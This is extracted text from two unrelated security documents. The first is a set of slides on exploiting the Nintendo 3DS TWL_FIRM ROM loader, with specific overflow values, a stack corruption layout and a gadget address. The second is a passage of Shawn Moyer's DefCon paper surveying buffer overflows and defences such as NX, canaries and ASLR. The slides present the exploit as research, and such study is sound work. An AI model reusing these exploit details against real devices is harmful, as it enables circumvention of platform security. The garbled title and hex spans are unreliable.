Because nothing’s ever enough with you people
Memory
CPUs
Devices
ARM9(
ARM11(
FCRAM(
WRAM(
VRAM(
ARM9(
internal(
GPU(
CRYPTO(
NAND(
What’s compromised so far
ARM9 responsibilities
• Brokers(access(to(storage((SD,(NAND…)(
• Includes(title(management((installing,(updating…)(
• Decrypts(and(verifies/authenticates(content(
• Owning(ARM11(is(enough(to(run(pirated(content,(but(not(to(decrypt(new(
content(if(an(update(is(released(
• Handles(backwards(compatibility(
• How(does(that(work?(
AGB_FIRM(
- AGB(=(GBA(codename(
- Used(to(run(GBA(
software(
- “Safe(mode”(FIRM(
- Used(to(do(firmware(
updates(
SAFE_FIRM(
- Main(FIRM(
- Runs(apps(and(games(
- 3DS(boots(it(by(default(
TWL_FIRM(
- TWL(=(DSi(codename(
- Used(to(run(DS(and(
DSi(software(
The 3DS’s “FIRM” firmware system
NATIVE_FIRM(
Memory
CPUs
Devices
GPU(
CRYPTO(
FIRM launch: ARM9 loads FIRM from NAND
ARM9(
ARM9(
internal(
NAND(
ARM11(
FCRAM(
WRAM(
VRAM(
Memory
CPUs
Devices
GPU(
FIRM launch: ARM9 uses CRYPTO hardware to decrypt and authenticate FIRM
ARM9(
ARM9(
internal(
NAND(
CRYPTO(
ARM11(
FCRAM(
WRAM(
VRAM(
Memory
CPUs
Devices
GPU(
FIRM launch: ARM9 copies sections to relevant locations
ARM9(
internal(
NAND(
CRYPTO(
ARM9(
ARM11(
FCRAM(
WRAM(
VRAM(
Memory
CPUs
Devices
ARM11(
FCRAM(
WRAM(
VRAM(
GPU(
FIRM launch: ARM9 signals ARM11 to run its FIRM section and then runs its own
ARM9(
internal(
NAND(
CRYPTO(
ARM9(
Memory
CPUs
Devices
ARM11(
FCRAM(
WRAM(
VRAM(
GPU(
FIRM launch: a compromised ARM11 can just keep running its own code
ARM9(
internal(
NAND(
CRYPTO(
ARM9(
Memory
CPUs
Devices
ARM11(
FCRAM(
WRAM(
VRAM(
GPU(
TWL_FIRM
ARM9(
internal(
NAND(
CRYPTO(
ARM9(
Runs(menu,(performs(some(rendering(tasks(((
Loads(and(verifies(ROM,(sets(up(backwards(compatibility(hardware(then(serves(as(DS(CPU(
Serves(as(DS’s(main(
RAM(
Contains(ARM11(code(
Where do ROMs come from?
• TWL_FIRM(can(load(ROMs(from(multiple(sources(
• Gamecarts((physical(games)(
• NAND((DSiWare)(
• ARM11((…?)(
• ROMs(are(authenticated(before(being(parsed(
• DSi(games(are(RSA(signed(
• DS(games(weren’t(signed(so(a(their(content(is(hashed(and(a(whitelist(is(used(
• This(should(be(fine…(
• But(for(some(reason,(those(checks(are(bypassed(when(the(ROM(comes(from(
the(ARM11(
DS mode memory layout
3DS_PA$=$(NDS_PA$-$0x02000000)$*$4$+$0x20000000$$
8(bytes(of(3DS(address(space(==(2(bytes(of(DS(space(
If(NDS_PA(isn’t(properly(bounded,(then(any(3DS_PA(value(is(
possible…(
Header"Overview$
$$Address$Bytes$Expl.$
$$000h$$$$12$$$$Game$Title$$(Uppercase$ASCII,$padded$with$00h)$
$$00Ch$$$$4$$$$$Gamecode$$$$(Uppercase$ASCII,$NTR-<code>)$$$$$$$$(0=homebrew)$
$$010h$$$$2$$$$$Makercode$$$(Uppercase$ASCII,$eg.$"01"=Nintendo)$(0=homebrew)$
$$012h$$$$1$$$$$Unitcode$$$$(00h=Nintendo$DS)$
$$013h$$$$1$$$$$Encryption$Seed$Select$(00..07h,$usually$00h)$
$$014h$$$$1$$$$$Devicecapacity$$$$$$$$$(Chipsize$=$128KB$SHL$nn)$(eg.$7$=$16MB)$
$$015h$$$$9$$$$$Reserved$$$$$$$$$$$(zero$filled)$
$$01Eh$$$$1$$$$$ROM$Version$$$$$$$$(usually$00h)$
$$01Fh$$$$1$$$$$Autostart$(Bit2:$Skip$"Press$Button"$after$Health$and$Safety)$
$$$$$$$$$$$$$$$$(Also$skips$bootmenu,$even$in$Manual$mode$&$even$Start$pressed)$
$$020h$$$$4$$$$$ARM9$rom_offset$$$$(4000h$and$up,$align$1000h)$
$$024h$$$$4$$$$$ARM9$entry_address$(2000000h..23BFE00h)$
$$028h$$$$4$$$$$ARM9$ram_address$$$(2000000h..23BFE00h)$
$$02Ch$$$$4$$$$$ARM9$size$$$$$$$$$$(max$3BFE00h)$(3839.5KB)$
$$030h$$$$4$$$$$ARM7$rom_offset$$$$(8000h$and$up)$
$$034h$$$$4$$$$$ARM7$entry_address$(2000000h..23BFE00h,$or$37F8000h..3807E00h)$
$$038h$$$$4$$$$$ARM7$ram_address$$$(2000000h..23BFE00h,$or$37F8000h..3807E00h)$
$$03Ch$$$$4$$$$$ARM7$size$$$$$$$$$$(max$3BFE00h,$or$FE00h)$(3839.5KB,$63.5KB)$
$$...$
DS ROM header format (credit: gbatek https://problemkaputt.de/gbatek.htm)
TWL_FIRM ROM loader code section checks
• section_ram_address$>=$0x02000000$
• section_ram_address$+$section_size$<=$0x02FFC000$
• section$doesn't$intersect$with$[0x023FEE00;$0x023FF000]$
• section$doesn't$intersect$with$[0x03FFF600;$0x03FFF800]$
No(upper(bound(on(section_ram_address(
No(bounds(check(on(section_size(
No(integer(overflow(check(
TWL_FIRM ROM loader code section checks
Constraints(are(respected:$
• 0xBC01B98D$>=$0x02000000$
• 0xBC01B98D$+$0x43FE4673$=$0$<=$0x02FFC000$
• section$doesn't$intersect$with$[0x023FEE00;$0x023FF000]$
• Because$0xBC01B98D$>$0x023FF000$
• section$doesn't$intersect$with$[0x03FFF600;$0x03FFF800]$
• Because$0xBC01B98D$>$0x03FFF800$
What if we want to write to 0x0806E634?
Example(values:(
• section_ram_address$=$0xBC01B98D$
• section_size$=$0x43FE4673$
• (0xBC01B98D$-$0x02000000)$*$4$+$0x20000000$=$0x0806E634$
What about the huge section size ?
ROM section loading code
• We(have(section_size(=(0x43FE4673(
• (0x43FE4673(bytes(is(about(1GB(of(data(
• =>(we(will(crash(if(we(can’t(interrupt(the(
copy(while(it’s(happening…(
• Fortunately,(load_nds_section(copies(in(
blocks(of(0x10000(bytes(at(most(
void$load_nds_section(u32$ram_address,$u32$rom_offset,$u32$size,$...)$
{$
$$...$
$
$$u32$rom_endoffset$=$rom_offset$+$size;$
$$u32$rom_offset_cursor$=$rom_offset;$
$$u32$ndsram_cursor$=$ram_address;$
$
$$while$($rom_offset_cursor$<$rom_endoffset$)$
$${$
$$$$curblock_size$=$0x10000;$
$$$$if$($rom_endoffset$-$rom_offset_cursor$<$curblock_size$)$
$$$${$
$$$$$$curblock_size$=$align32(rom_endoffset$-$rom_offset_cursor);$
$$$$}$
$
$$$$memcpy(buf,$rom_offset_cursor$+$0x27C00000,$curblock_size);$
$
$$$$...$
$
$$$$write_ndsram_section(ndsram_cursor,$buf,$curblock_size);$
$
$$$$rom_offset_cursor$+=$curblock_size;$
$$$$ndsram_cursor$+=$curblock_size;$
$$}$
$
$$...$
}$
$
$
Performs(the(actual(copy(–(
can(hijack(its(return(address(
TWL_FIRM’s “weird” memcpy
void$write_ndsram_section(u32$ndsram_dst,$u16*$src,$int$len)$
{$
$$u16*$ctr_pa_dst$=$convert_ndsram_to_ctrpa(ndsram_dst);$
$
$$for(int$i$=$len;$i$!=$0;$i$-=$2)$
$${$
$$$$*ctr_pa_dst$=$*src;$
$
$$$$ctr_pa_dst$+=$4;$
$$$$src$+=$4;$
$$}$
}$
Copies(2(bytes(at(a(time…(
…every(8(bytes(
Corrupting the stack
08032F41$
00000000$
080C0000$
C0180000$
08033851$
00000000$
00010000$
0806E66C$
00000001$
00010000$
0808922C$
00010000$
08089E64$
0808923C
0803DCDC$
0806E634"
0806E638"
0806E63C"
0806E640"
0806E644"
0806E648"
0806E64C"
0806E650"
0806E654"
0806E658"
0806E65C"
0806E660"
0806E664"
0806E668"
0806E66C"
write_ndsram_section(return(address(
load_nds_section stack
Value
Address
Bytes(we(can(overwrite(
⇒ We(can(only(redirect(to(a(gadget(within(
a(0x10000(byte(region(
⇒ We(can(only(generate(addresses(within(
0x10000(byte(regions(determined(by(
pointers(already(on(the(stack(
Corrupting the stack
08035512$
00000000$
080C0000$
C0180000$
08033851$
00000000$
00010000$
0806E66C$
00000001$
00010000$
08089064$
00010000$
08089E64$
0808923c
0803DCDC$
0806E634"
0806E638"
0806E63C"
0806E640"
0806E644"
0806E648"
0806E64C"
0806E650"
0806E654"
0806E658"
0806E65C"
0806E660"
0806E664"
0806E668"
0806E66C"
Value
Address
ADD$SP,$SP,$#0x14$
POP${R4-R7,PC}$
ADD$SP,$SP,$#0x14(
POP${R4-R7}(
Points(to(code(in(the(NDS(ROM(header(
(Process9(doesn’t(have(DEP)(
load_nds_section stack
Memory
CPUs
Devices
ARM9(
ARM11(
FCRAM(
WRAM(
VRAM(
ARM9(
internal(
GPU(
CRYPTO(
NAND(
ARM9 down J
Thanks to:
derrek, nedwill, yellows8, plutoo, naehrwert
@smealum(
Code available at github.com/smealum
Icon credits
• https://www.webdesignerdepot.com/2017/07/free-download-flat-
nintendo-icons/(
• https://www.flaticon.com/free-icon/gaming_771247(
• https://www.flaticon.com/free-icon/checked_291201(
• https://www.flaticon.com/free-icon/close_579006(
• https://www.flaticon.com/free-icon/twitter_174876( | pdf |
(((uuunnn))) SSSm
m
maaassshhhiiinnnggg ttthhheee SSStttaaaccckkk:::
22288 77755 666ee 22299 55533 666dd 66611 7733 66688 66699 66ee 66677 22200 55544 6688 6655 2200 55533 77744 66611 66633 666bb 333aa
8 5 e 9 3 d 1 73 8 9 6e 7 0 4 68 65 20
3 4 1 3 b a
fff o
ttt
fff 6 65 72 66 c fff 77 3 c 0 3
5 e
4 5 2 d 5 1 3
1 e
4 8 5 0 2 5 1 c 0 7 fff 72 6c 4
O
OOvvveeerrr llloow
w
wsss,,, CCCooouuunnn eeerrrm
m
meeeaaasssuuurrreeesss,,,
444 77766 6655 7722 6666 666cc 666 7777 77733 222cc 22200 44433 666fff 77755 666ee 77744 66655 77722 666dd 66655 66611 77733 777555 777222 666555 777333 222ccc
aaannnddd ttthhheee RRReeeaaalll W
W
Wooorrrlllddd
66611 666ee 666444 222000 77744 66688 66655 22200 55522 66655 66611 666cc 22200 55577 666 7722 66cc 66644
Shawn Moyer
Chief Researcher, SpearTip Technologies
http://www.speartip.net
{ b l a c k h a t } [ at ] { c i p h e r p u n x } [ dot ] { o r g }
0x00: Intro :: Taking the blue pill (at first).
My first exposure to buffer overflows, like much of my introduction to the security field,
was while working for a small ISP and consulting shop in the 90’s. Dave, who was building a
security practice, took me under his wing. I was a budding Linux geek, and I confessed an
affinity for Bash. After a brief lecture about the finer points of tcsh, Dave borrowed my laptop
running Slackware, and showed me the Bash overflow in PS1, found by Razvan Dragomirescu.
This was a useful demonstration in that a simple environment variable would work to overwrite a
pointer, though I immediately asked the importunate question of what good it did anyone to get
a command shell to crash and then, well, run a command, in the context of the same user. I
supposed if I ever encountered a restricted Bash shell somewhere, I was now armed to the
teeth.
Just the same, I wanted to understand: how did those bits of shellcode get where they shouldn’t
be, and get that nasty “/bin/ls” payload to run?
Not too long after Dave’s demonstration, I spent a lot of time puzzling over Aleph One, got my
brain around things relatively well, and then rapidly went orthogonal on a career that rarely, if
ever, touched on the internals of buffer overflows. I was far too busy over the next ten years or
so (like most folks in InfoSec) building defenses and sandbagging against the deluge of remote
exploits hitting my customers and employers. I spent my days and nights scouring BugTraq (later
Vulnwatch and Full-Disclosure), writing internal advisories, firefighting compromises and
outbreaks, and repeating the same mantra to anyone who would listen:
Patch early, and patch often.
Rinse, lather, repeat.
Service packs begat security rollups.
Security rollups begat Patch Tuesday
.
Patch Tuesday begat off-cycle emergency updates.
Last week, the network admins rebooted my workstation three times. Seriously.
In the past few years, we seem to have found ourselves, as Schneier often points out, getting
progressively worse and worse at our jobs. While aggressive code auditing of critical pieces of
infastructure like Bind, Apache, Sendmail, and others may have reduced the volume of memory
corruption vulnerabilities found in critical services in recent years, they haven’t reduced the
severity of the exposure when they are.
Of course, the client end is a minefield as well – email-based attacks, phishing, pharming, XSS,
CSRF and the like have all shown that users are unfailingly a weak link, to say nothing of web
application threats and the miles of messy client- and server-side issues with Web 2.0… Just the
same, memory corruption vulnerabilities can lead to exploitation of even the best-educated, best-
hardened, best-audited environments, and render all other protection mechanisms irrelevant.
The most recent proof that comes to mind, likely because I spent a very long week involved in
cleanup for both private sector and some government sites, is Big Yellow. Say it with me: A
Shawn Moyer :: (un)Smashing the Stack :: DefCon 0x0F :: Page 2 of 13
remote service. Listening on an unfiltered port on thousands of machines. Running with very high
privileges. Vulnerable to a stack-based overflow.
Sound familiar?
In my caffeine-addled fog on an all-night incident response for this latest worm-of-the-moment, I
asked myself: Does this make sense? Should we really be blaming vendors, or disclosure, or
automation, or even the cardinal sin of failing to patch, for what ultimately comes down to a
fundamental problem in error handling and memory allocation, described to me so succinctly by
Dave all those years ago as “ten pounds of crap in a five pound bag”?
Recently, Jon Richard Moser of Ubuntu Hardened did an analysis of the first 60 Ubuntu Security
Notices, and found that of these, around 81% were due to either buffer overflows, integer
overflows, race conditions, malformed data handling, or a combination of all four. Moser believes
that the aggregate of available proactive security measures in compilers, kernel patches, and
address space protections available today could serve to obviate many, if not all of these
vulnerabilities.
After a lot of digging, I think Moser may be right, though the devil, of course, is in the details.
0x01: When Dinosaurs roamed the Earth.
The first widely exploited buffer overflow was also what’s generally credited as the first
self-replicating network worm, the response to which is covered in detail in RFC1135, circa 1988:
“The Helminthiasis of the Internet”. A helminthiasis, for those without time or inclination to crack
open a thesaurus, is a parasitic infestation of a host body, such as that of a tapeworm or
pinworm. The analogy stuck, and all these years later it’s still part of the lingua franca of IT.
The Morris Worm was a 99-line piece of C code designed with the simple payload of replicating
itself, that (intentionally or otherwise) brought large sections of the then-primarily research
network offline for a number of days, by starving systems of resources and saturating network
connections while it searched for other hosts to infect.
What’s relevant today about Morris is one of the vectors it used for replication: a stack-based
overflow in the gets() call in SunOS’s fingerd. In his analysis in 1988, Gene Spafford describes
the vulnerability, though he’s a bit closed-mouthed about the mechanics of how things actually
worked:
The bug exploited to break fingerd involved overrunning the buffer the daemon used for
input. The standard C library has a few routines that read input without checking for
bounds on the buffer involved. In particular, the gets() call takes input to a buffer
without doing any bounds checking; this was the call exploited by the Worm.
The gets() routine is not the only routine with this flaw. The family of routines
scanf/fscanf/sscanf may also overrun buffers when decoding input unless the user
explicitly specifies limits on the number of characters to be converted. Incautious use of
the sprintf routine can overrun buffers. Use of the strcat/strcpy calls instead of the
strncat/strncpy routines may also overflow their buffers.
Shawn Moyer :: (un)Smashing the Stack :: DefCon 0x0F :: Page 3 of 13
What strikes me most about the above is that Spafford is still spot-on, nineteen years later.
Unchecked input for misallocated strings or arrays, and the resulting ability to overwrite pointers
and control execution flow, whether on the stack, the heap or elsewhere, remains a (mostly)
solvable problem, and yet the exposure remains with us today.
After Morris, things were a bit quieter for awhile on the buffer overflow front. Rapid adoption of
PC’s, and the prevalence of nothing even resembling a security model for commodity operating
systems, meant that the primary attack surfaces were boot sectors and executables, and for the
rest of the 1980’s virii were of substantially more scrutiny as an attack vector, for both defenders
and attackers.
This isn’t to say this class of vulnerabilities wasn’t known or understood, or that Morris was the
first to exploit them – in fact Nate Smith, in a paper in 1997, describes “Dangling Pointer Bugs”,
and the resulting “Fandango on Core” as being known of in the ALGOL and FORTRAN
communities since the 1960’s!
As has widely been stated, as soon as alternatives to writing code directly to hardware in
assembler became readily available, the abstraction has created exposure. Of course, I’d be
remiss if I didn’t point out that for nearly as long, a move to type-safe or even interpereted
languages has been suggested as the best solution.
Just the same, let’s accept for now that the massive installed base of critical applications and
operating systems in use today that are developed in C and C++ will make this infeasible for
many, many years to come. Also, as Dominique Brezinski pointed out in a recent BlackHat talk,
even an interpereted language, presumably, needs an interpereter, and overflows in the
interpereter itself can still lead to exploitation of code, safe types, bounds-checking, and
sandboxing notwithstanding.
0x02: Things get interesting.
In February of 1995, Thomas Lopatic posted a bug report and some POC code to the
Bugtraq mailing list.
Hello there,
.
We've installed the NCSA HTTPD 1 3 on our WWW server (HP9000/720, HP-UX 9.01) and
I've found that it can be tricked into executing shell commands. Actually, this bug is
similar to the bug in fingerd exploited by the internet worm. The HTTPD reads a
maximum of 8192 characters when accepting a request from port 80. When parsing the
URL part of the request a buffer with a size of 256 characters is used to prepend the
document root (function strsubfirst(), called from translate_name()). Thus we are able to
overwrite the data after the buffer.
The unchecked buffer in NCSA’s code to parse GET requests could be abused due to the use of
strcpy() rather than strncpy(), just as described by Spafford in his analysis of the Morris worm
seven years earlier. He included some example code that wrote a file named “GOTCHA” in the
server’s /tmp directory, after inserting some assembler into the stack.
Shawn Moyer :: (un)Smashing the Stack :: DefCon 0x0F :: Page 4 of 13
US-CERT recorded a handful of buffer-overflow-based vulnerabilities in the years since Morris,
but what made a finding like Lopatic’s so relevant was the rapid adoption of NCSA’s httpd, and
the growth of the Internet and its commercialization. This really was a whole new (old) ballgame.
The ability to arbitrarily execute code, on any host running a web server, from anywhere on the
Internet, created a new interest in what Morris’ stack scribbling attack a number of years ago had
already proven: memory corruption vulnerabilities were a simple and effective way to execute
arbitrary code remotely, at will, on a vulnerable host.
In the next two years, Mudge released a short paper (which he described as really a note to
himself) on using GCC to build shellcode without knowing assembly, and how to use gdb to step
through the process of inserting code onto the stack.
Shortly after, Aleph One’s seminal work on stack-based overflows expanded on Mudge, and
provided the basis for the body of knowledge still relevant today in exploiting buffer overflows.
It’s hard (if not impossible) to find a book or research paper on overflows that doesn’t reference
“Smashing the Stack for Fun and Profit”, and with good reason.
Aleph One’s paper raised the bar, synthesizing all the information available at the time, and made
stack-based overflow exploit development a refinable and repeatable process. This is not to say
that the paper created the overflow problem, and almost certainly the underground had
information at the time to rival that available to the legitimate security community. While in some
ways kicking off the disclosure debate, what “Smashing the Stack” ultimately provided was a
starting point for clearly understanding the problem.
Overflows began to rule the day, and in the late 90’s a number of vulnerabilities were unearthed
in network services, including Sendmail, mountd, portmap and Bind, and repositories of reusable
exploit code like Rootshell.com and others became a source of working exploits for unpatched
services for any administrator, pen-tester (and yes, attacker) with access to a Linux box and a
compiler.
While other classes of remotely exploitable bugs were of course found during this time and after,
it’s fair to say that Crispin Cowan was accurate in 1998 when he referred to overflows as “the
vulnerability of the decade”. In 2002, Gerhard Eschelbeck of Qualys predicted another ten years
of overflows as the most common attack vector. Can we expect the same forecast in 2012?
0x03: Fear sells.
For the most part, the “decade of buffer overflows” did little to change the reactive
approach to vulnerabilities systemic to our field. With some notable of exceptions, while
exploitation of memory corruption vulnerabilities became incredibly refined (“Point. Click. Own.”),
the burgeoning (now, leviathan) security industry as a whole either missed the point or, if you’re
of a conspiratorial bent, chose to ignore it.
Compromises became selling tools for firewall and IDS vendors, with mountains of security gear
stacked like cordwood in front of organizations’ ballooning server farms, and these, along with
the DMZ and screened subnet approach, allowed the damage from exploitation to be contained,
if not prevented.
Shawn Moyer :: (un)Smashing the Stack :: DefCon 0x0F :: Page 5 of 13
Fortunes were made scanning for patchlevels, and alerting on ex post acto exploitation.
Consultants built careers running vulnerability scanners, reformatting the results with their
letterhead, and delivering the list of exploitable hosts (again, often due to memory corruption
vulnerabilities in network services), along with a hefty invoice, to the CIO or CSO.
f
The mass of the security industry simply adopted the same model it had already refined with
antivirus – signatures for specific attacks, and databases of vulnerable version numbers, for sale
on a subscription basis. None of this addressed the fundamental problem, but it was good
business, and like antivirus, if an organization kept their signatures updated and dedicated an
army of personnel to scan and patch, they could at least promise some semblance of safety.
0x04: Yelling “theater” in a crowded fire.
While the march of accelerated patch cycles and antvirus and IDS signature downloads
prevailed, a small but vocal minority in the security community continued to search for other
solutions to the memory corruption problem.
Ultimately many of these approaches either failed or were proven incomplete, but over time, the
push and pull of new countermeasures and novel ways to defeat them has refined these
defenses enough that they can be considered sound as a stopgap that makes exploitation of
vulnerable code more difficult, though of course not impossible.
The refinement of memory corruption attacks and countermeasures shares a lot with the
development of cryptosystems: an approach is proposed, and proven breakable, or trustworthy,
over time. As we’ll see later, like cryptography, the weaknesses today seem to lie not in the
defenses themselves, but in their implementation. Because so many different approaches have
been tried, we’ll focus on those that are most mature and that ultimately gained some level of
acceptance.
0x05: Data is data, code is code, right?
The concept is beguiling: in order for a stack-based overflow to overwrite a return
pointer, a vulnerable buffer, normally reserved for data, must be stuffed with shellcode, and a
pointer moved to return to the shellcode, which resides in a data segment. Since the code
(sometimes called “text”) segment is where the actual instructions should reside on the stack, a
stack-based overflow is by definition an unexpected behavior.
So, why not just create a mechanism to flag stack memory as nonexecutable (data) or
executable (code), and simply stop classic stack-based overflows entirely? In the POSIX
specification, this means that a given memory page can be flagged as PROT_READ and
PROT_EXEC, but not PROT_WRITE and PROT_EXEC, effectively segmenting data and code.
SPARC and Alpha architectures have had this capability for some time, and Solaris from 2.6 on
has supported globally disabling stack execution in hardware. 64-bit architectures have a
substantially more granular paging implementation, which makes this possible much more
trivially – this is what prompted AMD to resurrect an implementation of this in 2001 with their
“NX” bit, referred to as “XD” (eXecute Disable) by Intel on EM64T.
Shawn Moyer :: (un)Smashing the Stack :: DefCon 0x0F :: Page 6 of 13
Software-based emulation on 32-bit architectures typically requires a “line in the sand” approach,
where some memory range is used for data, and another for code. This is far less optimal, and
may be possible to circumvent under specific conditions. With hardware-based nonexecutable
stack features now widely available, this will become less of an issue over time, but for now,
software emulation is better than no protection at all.
Historically, execution on the stack had been expected in some applications – called trampolining,
the somewhat cringeworthy process of constructing code on the fly on the stack can yield some
performance and memory access benefits for nested functions. In the past, a nonexecutable
stack has broken X11, Lisp, Emacs, and a handful of other applications. With the advent of wider
adoption of NX, and “trampoline emulation” in software, this is no longer as much of an issue,
though it delayed adoption for some time.
Solar Designer built the first software noexec implementation for the Linux kernel, in 1997. When
it was proposed for integration into the kernel mainline, it was refused for a number of reasons.
Trampolines, and the work required to make them possible, was a large factor. In a related
thread on disabling stack execution, Linus Torvalds also gave an example of a return-to-libc
attack, and stated that a nonexecutable stack alone would not ultimately solve the problem.
In short anybody who thinks tha the non-execu able stack gives them any real security
is very very much living in a dream world. It may catch a few attacks for old binaries that
have security problems, but the basic problem is that the binaries allow you to overwrite
their stacks. And if they allow that, then they allow the above exploit.
,
t
t
It probably takes all of five lines of changes to some existing exploit, and some random
program to find out where in the address space the shared libraries tend to be loaded.
Torvald’s answer was prescient, and in recent years the most common approach to defeating
hardware and software non-executable stack has been return-to-libc. On Windows, Dave Maynor
also found that overwriting an exception handler or targeting the heap was effective, and Krerk
Piromposa and Richard Embody noted that a “Hannibal” attack, or multistage overflow, in which
a pointer is overwritten to point to an arbitrary address, and then shellcode is written to the
arbitrary address in the second stage, could succeed. In all of these cases, data segments on the
stack were not replaced with code, and so the read-exec or read-write integrity remained intact.
Still, Solar’s patch gained adoption among security-centric Linux distributions, and it offered some
level of protection, if only by obscurity – most distributions of Linux had fully executable stacks,
so typical exploits in wider use would fail on systems using the patchset.
Over time, the inarguability of a simple protection against an entire class of overflow exploits led
to the nonexecutable stack being ubiquitous. Today, WinXP SP2, 2003, and Vista have software-
based nonexecutable stacks and integrate with hardware protection on 64-bit platforms, as does
Linux (via PaX or RedHat’s ExecShield), OpenBSD with W^X, and even (on Intel) MacOS X.
Outside of the use of other classes of attacks, such as writing to the heap, or ret-to-libc, likely
the key issue with stack protection on any platform is the ability to disable it at will. The
mprotect() function on Linux / Unix and VirtualProtect() in Windows allow applications to ask for
stack execution at runtime, and opt out of the security model. Microsoft’s .NET JIT compiler,
Sun’s JRE, and other applications that compile code at run-time expect to create code on the
stack, so these may become an area of greater scrutiny in the future.
Shawn Moyer :: (un)Smashing the Stack :: DefCon 0x0F :: Page 7 of 13
Certainly nonexecutable stacks are only a small part of the solution, and opt-out with mprotect()
and VirtualProtect() give developers the ability to override them, but they are computationally
inexpensive, and a worthy part of a larger approach.
0x06: The canary in the coalmine.
Crispin Cowan’s StackGuard, released in 1997, was the first foray into canary-based stack
protection as a mechanism to prevent buffer overflows. The approach was simple: place a
“canary” value into the stack for a given return address, via patches to GCC, in
function_prologue. On function_epilogue, if a change to the canary value was detected, the
canary checks called exit() and terminated the process.
Cowan found that StackGuard was effective at defending against typical stack-based overflows in
wide use at the time, either stopping them entirely, or creating a Denial of Service condition by
causing the service to exit.
After StackGuard’s initial release, Tim Newsham and Thomas Ptacek pointed out two issues in the
implementation, less than 24 hours later. The problem was in the canary value’s lack of
randomization. If a guessable or brute-forceable canary was the only protection in place, the
defense was only as good as the canary. So, either guessing the canary, or finding a way to read
the canary value from memory, would render the defense void.
But even with a stronger canary value, the larger weakness of protecting only the return address
remained. While the return address is one of the most effective and common targets in exploiting
an overflow, it’s by no means the only one. Essentially, any other area in memory was
unprotected, so as long as the canary was intact, the injected shellcode still ran.
Originally introduced in Phrack 56 by HERT, an effective approach was demonstrated – writing
“backward” in specific cases via an unbounded strcpy() could bypass the protection. The Phrack
56 article also proved exploitability of the same weaknesses in the canary value Newsham and
Ptacek had already pointed out. This led to the adoption of a more robust approach to the canary
value, and an XOR’d canary of a random value and the return address was eventually adopted in
future versions. Gerardo Richarte of Core Security also demonstrated that writes to the Global
Offset Table, “after” the return address, as well as overwrites of frame pointers and local
variables, would still lead to code execution.
Hiroaki Etoh’s ProPolice built on StackGuard’s canary concept, but matured the approach much
further, and created a full implementation that added canaries (Etoh prefers the term “guard
instruments”) for all registers, including frame pointers and local variables, and also reordered
data, arrays, and pointers on the stack to make overwriting them more difficult: if pointers and
other likely targets are not near data in memory, it becomes much more difficult to overwrite a
given buffer and move the pointer to the supplied shellcode.
In 2004, Pete Silberman and Richard Johnson used John Wilander’s Attack Vector Test Platform
to evaluate ProPolice and a number of other overflow protection methods, and found ProPolice
effective at stopping 14 of the 20 attack vectors tested by AVTP. ProPolice’s primary weaknesses
were in not protecting the heap and bss, and in not protecting smaller arrays or buffers.
ProPolice was accepted for inclusion with GCC 4.1, and was included in OpenBSD and Ubuntu as
a backport to GCC 3.x. With 4.1 integration, it’s now available in every major Linux and most
Shawn Moyer :: (un)Smashing the Stack :: DefCon 0x0F :: Page 8 of 13
Unix distributions, and each of the BSD’s. Microsoft also integrated a variant of XOR canaries and
a limited level of stack reordering into WinXP SP2 and Windows 2003 and Vista. It’s extremely
important to note that compiler flags for what protections are enabled need to be set to take
advantage of ProPolice on any platform, and are generally not enabled by default. On Linux /
Unix, the “—fstack-protector and –fstack-protector-all” flags must be set, and on Windows,
applications need to be compiled with /GS to gain ProPolice-like functionality.
0x07: /dev/random pitches in to help
In 2001, the PaX team introduced ASLR, or address space layout randomization, as part
of the PaX suite of security patches to the Linux kernel. ASLR in a number of forms was also
introduced into OpenBSD around roughly the same time, and due to some contention in these
two camps over a number of topics, it’s best to say that a bit of credit belongs to both, though
I’m sure they shared a collective sigh when Microsoft introduced it five years later in Vista, to
much fanfare and fawning in the IT press.
In general, ASLR randomizes memory allocation so that a given application, kernel task or library
will not be in the same address with (hopefully) any level of predictability. This aims to make
reusable exploits tougher to develop, as addresses to be targeted for example in a return-to-libc
attack, like the address of the system() call, will not be in the same location on multiple
machines.
Like attacks on TCP sessions with sequential ISN’s, which made IP spoofing relatively trivial, an
exploit usually needs a known, predicatable address to target. By randomizing memory in the
kernel, stack, userspace, or heap, ASLR aims to make exploits less successful.
In practice, like StackGuard’s canary value, if ASLR’s randomization is weak, it becomes trivial to
break. This is especially true for services that fork and respawn, such as Apache, or any service
running inside a wrapper application that restarts it upon failure.
Hovav Schacham and a group of other researchers found that by enumerating offsets of known
libc functions by a series of unsuccessful attempts – their example used usleep(), but any widely-
available function with a known offset would work – they could effectively brute-force ASLR
randomization through a series of failed overflow attempts on a respawning service, crashing it
numerous times but eventually successfully exploiting the service and returning to libc.
With this method, Shacham was able to compromise a vulnerable ASLR-protected Apache via
brute force in around 200 seconds. Since 32-bit ASLR implementations use far less entropy than
64-bit, it was noted that 64-bit ASLR would be substantially more time-consuming to defeat. Also,
Shacham’s scenario presumes a service that restarts rather than simply crashes, so detecting a
repeated number of failures (which the PaX team also recommends) would render the attack a
denial of service rather than code execution.
Most other methods of defeating ASLR work in a similar way: if an offset of a known-sized
function can be obtained, return-to-libc is possible. In Phrack 59, “Tyler Durden” (a pseudonym
and tip-of-the-hat to the film Fight Club) used format string vulnerabilities as an example to
disclose addresses on a PaX-enabled system. Ben Hawkes of SureSec presented a method he
called “Code Access Brute Forcing” at RuxCon in the past year that used, like Shacham, a series
of unsuccesful reads to map out memory in OpenBSD.
Shawn Moyer :: (un)Smashing the Stack :: DefCon 0x0F :: Page 9 of 13
On the Microsoft front, Ollie Whitehouse of Symantec performed a series of regression tests of
Vista’s ASLR, and found it to be substantially weaker on the heap and process environment
blocks (PEBs) than in other areas, and that heap randomization was actually better using ANSI
C’s malloc() than MS’s recommended HeapAlloc().
Since even in the best cases Vista’s ASLR is weaker than that of most other implementations in
terms of bits of entropy, it seems likely that derandomization attacks like Shacham’s will be
effective to some extent. Additionally, like stack protection, Microsoft allows applications to opt-in
or opt-out, which means for some apps protections may not be consistent.
If sufficiently randomized, and if not readable in some other way such as via format string bugs
or other information leakage, ASLR does still present a substantial barrier to heap overflows and
return-to-libc attacks. This is especially true if all applications are built as PIC or PIE (Position-
Independent Executables|Code), which make it possible for running applications, in addition to
libraries and stack or heap memory, to load at less predictable locations.
0x08: How about just fixing the code?
For some time, extensive code review has been posited as the best route to securing
vulnerable applications. The OpenBSD project in particular has spent a number of years
aggressively working to identify security bugs as part of the development process. After a
number of remote vulnerabilities were still found in released code, Theo DeRaadt, long a
proponent of pure code review and secure-by-default installations as the best approach to
security, famously altered his position and began implementing a number of stack and heap
protection measures as well as ASLR and other mechanisms to make overflow exploitation more
difficult.
Still, fixing vulnerabilities in code before they become exposures is without question the most
effective route, and software developers are far more aware today than in previous years of the
